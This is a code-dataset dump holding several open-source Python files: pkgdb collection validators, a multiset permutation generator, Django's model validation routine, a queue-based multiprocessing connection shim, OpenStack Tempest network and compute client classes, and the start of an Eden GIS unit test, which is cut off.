repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
fedora-infra/packagedb
|
pkgdb/lib/validators.py
|
2
|
10016
|
# -*- coding: utf-8 -*-
#
# Copyright © 2008, 2010 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2, or (at your option) any later version. This
# program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the GNU
# General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public License and
# may only be used or replicated with the express permission of Red Hat, Inc.
#
# Red Hat Author(s): Toshio Kuratomi <[email protected]>
#
'''
Collection of validators for parameters coming to pkgdb URLs.
'''
#
#pylint Explanations
#
# :E1101: SQLAlchemy monkey patches database fields into the mapper classes so
# we have to disable this when accessing an attribute of a mapped class.
# Validators also have a message() method which FormEncode adds in a way
# that pylint can't detect.
# :W0232: Validators don't need an__init__method
# :W0613: Only a few validators use the state parameter
# :W0622: We have to redefine _ due to a FormEncode limitation
# :R0201: Validators are following an API specification so need certain
# methods that would otherwise be functions
# :R0903: Validators will usually only have two methods
#pylint:disable-msg=W0232,R0201,R0903,W0613
import re
from turbogears.validators import Invalid, FancyValidator, Set, Regex, \
UnicodeString
from sqlalchemy.exceptions import InvalidRequestError
try:
from fedora.textutils import to_unicode
except ImportError:
from pkgdb.lib.utils import to_unicode
from pkgdb.model import Collection
from pkgdb.lib.utils import STATUS
#pylint:disable-msg=W0622
def _(string):
''' *HACK*: TurboGears/FormEncode requires that we use a dummy _ function.
Internationalizing error messages won't work otherwise.
http://docs.turbogears.org/1.0/Internationalization#id13
'''
return string
#pylint:enable-msg=W0622
#
# SetOf validator can validate its elements
#
class SetOf(Set):
'''formencode Set() validator with the ability to validate its elements.
:kwarg element_validator: Validator to run on each of the elements of the set.
'''
element_validator = None
messages = {'incorrect_value': 'list values did not satisfy the element_validator'}
def validate_python(self, value, state):
if self.element_validator:
try:
value = map(self.element_validator.to_python, value)
except Invalid:
raise
except:
# Just in case the element validator doesn't throw an Invalid
# exception
raise Invalid(self.message('incorrect_value', state),
value, state)
#
# Three sorts of validators:
#
# 1) does minimal checking that a string looks sort of right
# - For these we'll mostly just use the standard tg and formencode
# validators.
# 2) Hits the db to verify that the string exists in the proper field
# - These are appropriate where we're going to use the string anyways. For
# instance, in a select statement.
# - These should be checked by making calls against something that's easily
# sent to a memcached or redis server.
# 3) Looks in the db and transforms the string into the type of thing that it
# is a key for
# - This will do an actual call into the database and load an ORM mapped
# object.
#
class IsCollectionSimpleNameRegex(Regex):
'''Test the collection simple name against a simple heuristic
:kwarg strip: If True, strips whitespace from the beginnng and end of the
value. (default True)
:kwarg regex: regular expression object or string to be compiled to match
the simple name against. Default: r'^[A-Z]+-([0-9]+|devel)$'
'''
strip = True
regex = re.compile(r'^((FC|fc|f|F|EL|el|)-?[0-9]+|devel)$')
messages = {'no_collection': _('%(collection)s does not match the pattern'
' for collection names')}
def _to_python(self, value, state):
value = Regex._to_python(self, value, state)
return to_unicode(value)
def validate_python(self, value, state):
if not self.regex.match(value):
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
class IsCollectionSimpleName(UnicodeString):
'''Test that the value is a recognized collection short name.
:kwarg eol: If True, include eol releases. (default False)
:kwarg strip: If True, strips whitespace from the beginnng and end of the
value. (default True)
'''
strip = True
eol = False
messages = {'no_collection': _('A collection named %(collection)s does'
' not exist'),
'eol_collection': _('Collection named %(collection)s is eol')
}
def validate_python(self, value, state):
try:
collection = Collection.by_simple_name(value)
except InvalidRequestError:
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
if not self.eol and (collection.statuscode ==
STATUS['EOL']):
raise Invalid(self.message('eol_collection', state,
collection=value), value, state)
return value
class IsCollection(IsCollectionSimpleName):
'''Transforms a Collection simplename into a Collection.
:kwarg eol: If True, include eol releases. (default False)
:kwarg strip: If True, strips whitespace from the beginnng and end of the
value. (default True)
:rtype: Collection
:returns: Collection that the simplename we were given references.
'''
messages = {'no_collection': _('A collection named %(collection)s does'
' not exist'),
'eol_collection': _('Collection named %(collection)s is eol')
}
def validate_python(self, value, state):
try:
collection = Collection.by_simple_name(value)
except InvalidRequestError:
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
if not self.eol and (collection.statuscode ==
STATUS['EOL']):
raise Invalid(self.message('eol_collection', state,
collection=value), value, state)
return collection
#
# Legacy -- Remove when we update the API
#
class CollectionName(FancyValidator):
'''Test that the value is a recognized collection name.'''
messages = {'no_collection': _('A collection named %(collection)s does'
' not exist.')}
def _to_python(self, value, state):
'''Just remove leading and trailing whitespace.'''
return value.strip()
def validate_python(self, value, state):
'''Make sure the collection is in the database.'''
#pylint:disable-msg=E1101
try:
Collection.query.filter_by(name=value).first()
except InvalidRequestError:
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
#pylint:enable-msg=E1101
#
# Chained Validators
#
# Note: Chained validators take different params so they are not interchangable
# with normal validators:
# validate_python: field_dict instead of value. This is a dictionary of the
# fields passed into the schema.
#
# raising Invalid: error_dict. In addition to the other values to Invalid()
# we send an error_dict that maps the field to display an error with to the
# message.
class CollectionNameVersion(FancyValidator):
'''Test the combination of a Collection and Version for validity.'''
messages = {'nameless_version': _('Version specified without a collection'
' name'),
'no_version': _('There is no collection for %(name)s-%(version)s'),
'no_collection': _('Collection named %(name)s does not exist')}
def validate_python(self, field_dict, state):
'''Make sure the Collection with the given `name` and `version` exists.
We want to allow for:
1) Neither to be set
2) Name to exist in the db and version unset
3) Name and version to exist in the db
'''
if not field_dict:
# It's okay for both to be none
return
errors = {}
name = field_dict.get('name')
version = field_dict.get('version')
if (not name) and version:
#pylint:disable-msg=E1101
errors['version'] = self.message('nameless_version', state)
elif name and version:
#pylint:disable-msg=E1101
try:
Collection.query.filter_by(name=name, version=version).one()
except InvalidRequestError:
errors['version'] = self.message('no_version', state,
name=name, version=version)
elif name and not version:
#pylint:disable-msg=E1101
try:
Collection.query.filter_by(name=name).first()
except InvalidRequestError:
errors['name'] = self.message('no_collection', state, name=name)
if errors:
error_list = sorted(errors.iteritems())
error_message = '\n'.join([u'%s: %s' % (error, msg)
for error, msg in error_list])
raise Invalid(error_message, field_dict, state,
error_dict=errors)
|
gpl-2.0
|
ekg/multichoose
|
multipermute.py
|
6
|
2680
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# multipermute.py - permutations of a multiset
# Erik Garrison <[email protected]> 2010
"""
This module encodes functions to generate the permutations of a multiset
following this algorithm:
Algorithm 1
Visits the permutations of multiset E. The permutations are stored
in a singly-linked list pointed to by head pointer h. Each node in the linked
list has a value field v and a next field n. The init(E) call creates a
singly-linked list storing the elements of E in non-increasing order with h, i,
and j pointing to its first, second-last, and last nodes, respectively. The
null pointer is given by φ. Note: If E is empty, then init(E) should exit.
Also, if E contains only one element, then init(E) does not need to provide a
value for i.
[h, i, j] ← init(E)
visit(h)
while j.n ≠ φ orj.v <h.v do
if j.n ≠ φ and i.v ≥ j.n.v then
s←j
else
s←i
end if
t←s.n
s.n ← t.n
t.n ← h
if t.v < h.v then
i←t
end if
j←i.n
h←t
visit(h)
end while
... from "Loopless Generation of Multiset Permutations using a Constant Number
of Variables by Prefix Shifts." Aaron Williams, 2009
"""
class ListElement:
def __init__(self, value, next):
self.value = value
self.next = next
def nth(self, n):
o = self
i = 0
while i < n and o.next is not None:
o = o.next
i += 1
return o
def init(multiset):
multiset.sort() # ensures proper non-increasing order
h = ListElement(multiset[0], None)
for item in multiset[1:]:
h = ListElement(item, h)
return h, h.nth(len(multiset) - 2), h.nth(len(multiset) - 1)
def visit(h):
"""Converts our bespoke linked list to a python list."""
o = h
l = []
while o is not None:
l.append(o.value)
o = o.next
return l
def permutations(multiset):
"""Generator providing all multiset permutations of a multiset."""
h, i, j = init(multiset)
yield visit(h)
while j.next is not None or j.value < h.value:
if j.next is not None and i.value >= j.next.value:
s = j
else:
s = i
t = s.next
s.next = t.next
t.next = h
if t.value < h.value:
i = t
j = i.next
h = t
yield visit(h)
if __name__ == '__main__':
import sys
multiset = sys.argv[1:]
if multiset != []:
for permutation in permutations(multiset):
for item in permutation:
print item,
print
else:
print "usage", sys.argv[0], "<multiset>"
|
mit
|
eltonsantos/django
|
django/core/management/validation.py
|
107
|
23840
|
import collections
import sys
from django.conf import settings
from django.core.management.color import color_style
from django.utils.encoding import force_str
from django.utils.itercompat import is_iterable
from django.utils import six
class ModelErrorCollection:
def __init__(self, outfile=sys.stdout):
self.errors = []
self.outfile = outfile
self.style = color_style()
def add(self, context, error):
self.errors.append((context, error))
self.outfile.write(self.style.ERROR(force_str("%s: %s\n" % (context, error))))
def get_validation_errors(outfile, app=None):
"""
Validates all models that are part of the specified app. If no app name is provided,
validates all models of all installed apps. Writes errors, if any, to outfile.
Returns number of errors.
"""
from django.db import models, connection
from django.db.models.loading import get_app_errors
from django.db.models.deletion import SET_NULL, SET_DEFAULT
e = ModelErrorCollection(outfile)
for (app_name, error) in get_app_errors().items():
e.add(app_name, error)
for cls in models.get_models(app, include_swapped=True):
opts = cls._meta
# Check swappable attribute.
if opts.swapped:
try:
app_label, model_name = opts.swapped.split('.')
except ValueError:
e.add(opts, "%s is not of the form 'app_label.app_name'." % opts.swappable)
continue
if not models.get_model(app_label, model_name):
e.add(opts, "Model has been swapped out for '%s' which has not been installed or is abstract." % opts.swapped)
# No need to perform any other validation checks on a swapped model.
continue
# If this is the current User model, check known validation problems with User models
if settings.AUTH_USER_MODEL == '%s.%s' % (opts.app_label, opts.object_name):
# Check that REQUIRED_FIELDS is a list
if not isinstance(cls.REQUIRED_FIELDS, (list, tuple)):
e.add(opts, 'The REQUIRED_FIELDS must be a list or tuple.')
# Check that the USERNAME FIELD isn't included in REQUIRED_FIELDS.
if cls.USERNAME_FIELD in cls.REQUIRED_FIELDS:
e.add(opts, 'The field named as the USERNAME_FIELD should not be included in REQUIRED_FIELDS on a swappable User model.')
# Check that the username field is unique
if not opts.get_field(cls.USERNAME_FIELD).unique:
e.add(opts, 'The USERNAME_FIELD must be unique. Add unique=True to the field parameters.')
# Model isn't swapped; do field-specific validation.
for f in opts.local_fields:
if f.name == 'id' and not f.primary_key and opts.pk.name == 'id':
e.add(opts, '"%s": You can\'t use "id" as a field name, because each model automatically gets an "id" field if none of the fields have primary_key=True. You need to either remove/rename your "id" field or add primary_key=True to a field.' % f.name)
if f.name.endswith('_'):
e.add(opts, '"%s": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.' % f.name)
if (f.primary_key and f.null and
not connection.features.interprets_empty_strings_as_nulls):
# We cannot reliably check this for backends like Oracle which
# consider NULL and '' to be equal (and thus set up
# character-based fields a little differently).
e.add(opts, '"%s": Primary key fields cannot have null=True.' % f.name)
if isinstance(f, models.CharField):
try:
max_length = int(f.max_length)
if max_length <= 0:
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
except (ValueError, TypeError):
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
if isinstance(f, models.DecimalField):
decimalp_ok, mdigits_ok = False, False
decimalp_msg = '"%s": DecimalFields require a "decimal_places" attribute that is a non-negative integer.'
try:
decimal_places = int(f.decimal_places)
if decimal_places < 0:
e.add(opts, decimalp_msg % f.name)
else:
decimalp_ok = True
except (ValueError, TypeError):
e.add(opts, decimalp_msg % f.name)
mdigits_msg = '"%s": DecimalFields require a "max_digits" attribute that is a positive integer.'
try:
max_digits = int(f.max_digits)
if max_digits <= 0:
e.add(opts, mdigits_msg % f.name)
else:
mdigits_ok = True
except (ValueError, TypeError):
e.add(opts, mdigits_msg % f.name)
invalid_values_msg = '"%s": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.'
if decimalp_ok and mdigits_ok:
if decimal_places > max_digits:
e.add(opts, invalid_values_msg % f.name)
if isinstance(f, models.FileField) and not f.upload_to:
e.add(opts, '"%s": FileFields require an "upload_to" attribute.' % f.name)
if isinstance(f, models.ImageField):
try:
from django.utils.image import Image
except ImportError:
e.add(opts, '"%s": To use ImageFields, you need to install Pillow. Get it at https://pypi.python.org/pypi/Pillow.' % f.name)
if isinstance(f, models.BooleanField) and getattr(f, 'null', False):
e.add(opts, '"%s": BooleanFields do not accept null values. Use a NullBooleanField instead.' % f.name)
if isinstance(f, models.FilePathField) and not (f.allow_files or f.allow_folders):
e.add(opts, '"%s": FilePathFields must have either allow_files or allow_folders set to True.' % f.name)
if isinstance(f, models.GenericIPAddressField) and not getattr(f, 'null', False) and getattr(f, 'blank', False):
e.add(opts, '"%s": GenericIPAddressField can not accept blank values if null values are not allowed, as blank values are stored as null.' % f.name)
if f.choices:
if isinstance(f.choices, six.string_types) or not is_iterable(f.choices):
e.add(opts, '"%s": "choices" should be iterable (e.g., a tuple or list).' % f.name)
else:
for c in f.choices:
if isinstance(c, six.string_types) or not is_iterable(c) or len(c) != 2:
e.add(opts, '"%s": "choices" should be a sequence of two-item iterables (e.g. list of 2 item tuples).' % f.name)
if f.db_index not in (None, True, False):
e.add(opts, '"%s": "db_index" should be either None, True or False.' % f.name)
# Perform any backend-specific field validation.
connection.validation.validate_field(e, opts, f)
# Check if the on_delete behavior is sane
if f.rel and hasattr(f.rel, 'on_delete'):
if f.rel.on_delete == SET_NULL and not f.null:
e.add(opts, "'%s' specifies on_delete=SET_NULL, but cannot be null." % f.name)
elif f.rel.on_delete == SET_DEFAULT and not f.has_default():
e.add(opts, "'%s' specifies on_delete=SET_DEFAULT, but has no default value." % f.name)
# Check to see if the related field will clash with any existing
# fields, m2m fields, m2m related objects or related objects
if f.rel:
if f.rel.to not in models.get_models():
# If the related model is swapped, provide a hint;
# otherwise, the model just hasn't been installed.
if not isinstance(f.rel.to, six.string_types) and f.rel.to._meta.swapped:
e.add(opts, "'%s' defines a relation with the model '%s.%s', which has been swapped out. Update the relation to point at settings.%s." % (f.name, f.rel.to._meta.app_label, f.rel.to._meta.object_name, f.rel.to._meta.swappable))
else:
e.add(opts, "'%s' has a relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, six.string_types):
continue
# Make sure the related field specified by a ForeignKey is unique
if f.requires_unique_target:
if len(f.foreign_related_fields) > 1:
has_unique_field = False
for rel_field in f.foreign_related_fields:
has_unique_field = has_unique_field or rel_field.unique
if not has_unique_field:
e.add(opts, "Field combination '%s' under model '%s' must have a unique=True constraint" % (','.join([rel_field.name for rel_field in f.foreign_related_fields]), f.rel.to.__name__))
else:
if not f.foreign_related_fields[0].unique:
e.add(opts, "Field '%s' under model '%s' must have a unique=True constraint." % (f.foreign_related_fields[0].name, f.rel.to.__name__))
rel_opts = f.rel.to._meta
rel_name = f.related.get_accessor_name()
rel_query_name = f.related_query_name()
if not f.rel.is_hidden():
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
seen_intermediary_signatures = []
for i, f in enumerate(opts.local_many_to_many):
# Check to see if the related m2m field will clash with any
# existing fields, m2m fields, m2m related objects or related
# objects
if f.rel.to not in models.get_models():
# If the related model is swapped, provide a hint;
# otherwise, the model just hasn't been installed.
if not isinstance(f.rel.to, six.string_types) and f.rel.to._meta.swapped:
e.add(opts, "'%s' defines a relation with the model '%s.%s', which has been swapped out. Update the relation to point at settings.%s." % (f.name, f.rel.to._meta.app_label, f.rel.to._meta.object_name, f.rel.to._meta.swappable))
else:
e.add(opts, "'%s' has an m2m relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, six.string_types):
continue
# Check that the field is not set to unique. ManyToManyFields do not support unique.
if f.unique:
e.add(opts, "ManyToManyFields cannot be unique. Remove the unique argument on '%s'." % f.name)
if f.rel.through is not None and not isinstance(f.rel.through, six.string_types):
from_model, to_model = cls, f.rel.to
if from_model == to_model and f.rel.symmetrical and not f.rel.through._meta.auto_created:
e.add(opts, "Many-to-many fields with intermediate tables cannot be symmetrical.")
seen_from, seen_to, seen_self = False, False, 0
for inter_field in f.rel.through._meta.fields:
rel_to = getattr(inter_field.rel, 'to', None)
if from_model == to_model: # relation to self
if rel_to == from_model:
seen_self += 1
if seen_self > 2:
e.add(opts, "Intermediary model %s has more than "
"two foreign keys to %s, which is ambiguous "
"and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
if rel_to == from_model:
if seen_from:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
seen_from = True
elif rel_to == to_model:
if seen_to:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
rel_to._meta.object_name
)
)
else:
seen_to = True
if f.rel.through not in models.get_models(include_auto_created=True):
e.add(opts, "'%s' specifies an m2m relation through model "
"%s, which has not been installed." % (f.name, f.rel.through)
)
signature = (f.rel.to, cls, f.rel.through)
if signature in seen_intermediary_signatures:
e.add(opts, "The model %s has two manually-defined m2m "
"relations through the model %s, which is not "
"permitted. Please consider using an extra field on "
"your intermediary model instead." % (
cls._meta.object_name,
f.rel.through._meta.object_name
)
)
else:
seen_intermediary_signatures.append(signature)
if not f.rel.through._meta.auto_created:
seen_related_fk, seen_this_fk = False, False
for field in f.rel.through._meta.fields:
if field.rel:
if not seen_related_fk and field.rel.to == f.rel.to:
seen_related_fk = True
elif field.rel.to == cls:
seen_this_fk = True
if not seen_related_fk or not seen_this_fk:
e.add(opts, "'%s' is a manually-defined m2m relation "
"through model %s, which does not have foreign keys "
"to %s and %s" % (f.name, f.rel.through._meta.object_name,
f.rel.to._meta.object_name, cls._meta.object_name)
)
elif isinstance(f.rel.through, six.string_types):
e.add(opts, "'%s' specifies an m2m relation through model %s, "
"which has not been installed" % (f.name, f.rel.through)
)
rel_opts = f.rel.to._meta
rel_name = f.related.get_accessor_name()
rel_query_name = f.related_query_name()
# If rel_name is none, there is no reverse accessor (this only
# occurs for symmetrical m2m relations to self). If this is the
# case, there are no clashes to check for this field, as there are
# no reverse descriptors for this field.
if rel_name is not None:
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
# Check ordering attribute.
if opts.ordering:
for field_name in opts.ordering:
if field_name == '?':
continue
if field_name.startswith('-'):
field_name = field_name[1:]
if opts.order_with_respect_to and field_name == '_order':
continue
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field_name:
continue
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
if field_name == 'pk':
continue
try:
opts.get_field(field_name, many_to_many=False)
except models.FieldDoesNotExist:
e.add(opts, '"ordering" refers to "%s", a field that doesn\'t exist.' % field_name)
# Check unique_together.
for ut in opts.unique_together:
validate_local_fields(e, opts, "unique_together", ut)
if not isinstance(opts.index_together, collections.Sequence):
e.add(opts, '"index_together" must a sequence')
else:
for it in opts.index_together:
validate_local_fields(e, opts, "index_together", it)
return len(e.errors)
def validate_local_fields(e, opts, field_name, fields):
from django.db import models
if not isinstance(fields, collections.Sequence):
e.add(opts, 'all %s elements must be sequences' % field_name)
else:
for field in fields:
try:
f = opts.get_field(field, many_to_many=True)
except models.FieldDoesNotExist:
e.add(opts, '"%s" refers to %s, a field that doesn\'t exist.' % (field_name, field))
else:
if isinstance(f.rel, models.ManyToManyRel):
e.add(opts, '"%s" refers to %s. ManyToManyFields are not supported in %s.' % (field_name, f.name, field_name))
if f not in opts.local_fields:
e.add(opts, '"%s" refers to %s. This is not in the same model as the %s statement.' % (field_name, f.name, field_name))
|
bsd-3-clause
|
pombredanne/teamwork
|
exts/wsgi/static/Brython2.1.0-20140419-113919/Lib/multiprocessing/dummy/connection.py
|
707
|
3049
|
#
# Analogue of `multiprocessing.connection` which uses queues instead of sockets
#
# multiprocessing/dummy/connection.py
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of author nor the names of any contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
__all__ = [ 'Client', 'Listener', 'Pipe' ]
from queue import Queue
families = [None]
class Listener(object):
def __init__(self, address=None, family=None, backlog=1):
self._backlog_queue = Queue(backlog)
def accept(self):
return Connection(*self._backlog_queue.get())
def close(self):
self._backlog_queue = None
address = property(lambda self: self._backlog_queue)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def Client(address):
_in, _out = Queue(), Queue()
address.put((_out, _in))
return Connection(_in, _out)
def Pipe(duplex=True):
a, b = Queue(), Queue()
return Connection(a, b), Connection(b, a)
class Connection(object):
def __init__(self, _in, _out):
self._out = _out
self._in = _in
self.send = self.send_bytes = _out.put
self.recv = self.recv_bytes = _in.get
def poll(self, timeout=0.0):
if self._in.qsize() > 0:
return True
if timeout <= 0.0:
return False
self._in.not_empty.acquire()
self._in.not_empty.wait(timeout)
self._in.not_empty.release()
return self._in.qsize() > 0
def close(self):
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
|
gpl-2.0
|
vedujoshi/tempest
|
tempest/lib/services/network/ports_client.py
|
2
|
3105
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.network import base
class PortsClient(base.BaseNetworkClient):
def create_port(self, **kwargs):
"""Creates a port on a network.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#create-port
"""
uri = '/ports'
post_data = {'port': kwargs}
return self.create_resource(uri, post_data)
def update_port(self, port_id, **kwargs):
"""Updates a port.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#update-port
"""
uri = '/ports/%s' % port_id
post_data = {'port': kwargs}
return self.update_resource(uri, post_data)
def show_port(self, port_id, **fields):
"""Shows details for a port.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#show-port-details
"""
uri = '/ports/%s' % port_id
return self.show_resource(uri, **fields)
def delete_port(self, port_id):
"""Deletes a port.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#delete-port
"""
uri = '/ports/%s' % port_id
return self.delete_resource(uri)
def list_ports(self, **filters):
"""Lists ports to which the tenant has access.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#list-ports
"""
uri = '/ports'
return self.list_resources(uri, **filters)
def create_bulk_ports(self, **kwargs):
"""Create multiple ports in a single request.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#bulk-create-ports
"""
uri = '/ports'
return self.create_resource(uri, kwargs)
def is_resource_deleted(self, id):
try:
self.show_port(id)
except lib_exc.NotFound:
return True
return False
|
apache-2.0
|
xbezdick/tempest
|
tempest/services/compute/json/floating_ip_pools_client.py
|
6
|
1314
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils as json
from six.moves.urllib import parse as urllib
from tempest.api_schema.response.compute.v2_1 import floating_ips as schema
from tempest.common import service_client
class FloatingIPPoolsClient(service_client.ServiceClient):
def list_floating_ip_pools(self, params=None):
"""Gets all floating IP Pools list."""
url = 'os-floating-ip-pools'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
self.validate_response(schema.list_floating_ip_pools, resp, body)
return service_client.ResponseBody(resp, body)
|
apache-2.0
|
tudorian/eden
|
tests/unit_tests/modules/s3/s3gis/YahooLayer.py
|
43
|
1342
|
s3gis_tests = load_module("tests.unit_tests.modules.s3.s3gis")
test_utils = local_import("test_utils")
yahoo_layer = dict(
name = "Test Yahoo Layer",
description = "Test Yahoo",
enabled = True,
created_on = datetime.datetime.now(),
modified_on = datetime.datetime.now(),
satellite_enabled = True,
